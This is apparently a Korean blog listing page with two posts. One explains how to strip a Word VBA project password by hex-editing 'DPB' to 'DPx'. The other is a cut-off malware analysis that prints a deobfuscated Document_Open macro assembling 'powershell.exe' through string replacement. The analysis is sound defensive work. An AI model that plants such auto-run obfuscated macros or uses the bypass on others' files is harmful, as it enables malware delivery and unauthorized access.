728x90 반응형 워드 매크로2 매크로에 비밀번호가 있는 경우 매크로 추출하는 방법(VBA 추출) 아래 그림과 같이 문서에서 매크로를 실행하면 비밀번호가 걸려있어 매크로 내용이 확인되지 않는다. 1. 문서명.doc > 문서명.zip 으로 압축파일로 확장자 변경한다. 2. zip 압축파일 열기 vbaProject.bin 을 압축파일에서 꺼낸다. 3. Hex 에디터 실행, 문자열 DPB 검색 4. DPB 문자열을 DPx로 변경 후 저장 5. 2.의 zip 파일의 원본 vbaProject.bin을 DPx로 변경한 vbaProject.bin 파일로 변경 6. 문서.zip파일을 다시 문서.doc로 변경 7. 문서 열면 오류발생 YES 눌러줌 8. Alt+F11 누르고 Project 오른쪽마우스클릭 > 속성 > 비밀번호를 쉽게 변경 후 문서저장 후 닫기 9. 다시 문서 실행, Alt+F11 하면 매크로가 살아있음 2022. 10. 15. 악성코드가 포함된 워드문서(doc) 분석 ○ 워드 문서를 열람하면 매크로 기능이 포함되어 있는 문서로 확인된다. ○ 매크로 내용을 확인한 결과, 난독화된 소스코드가 확인되며 디코딩하면 아래 표와 같다. Public Sub Document_Open() Set a = CreateObject("Shell.Application") Dim d f = "vnslajdsladkf" f = Left(f, 5) #vnsla 문자열 추출 d = "pvnslavnslaowvnslavnslavnslaersvnslahelvnslavnslal.evnslaxvnslae" d = Replace(d, f, "") # d 변수 문자열에서 “vnsla”을 공백으로 변경 # d = "powershell.exe" h = "[vnslastvnslarivnslanvnslag]$vnsl.. 2022. 10. 3. 이전 1 다음 728x90 반응형
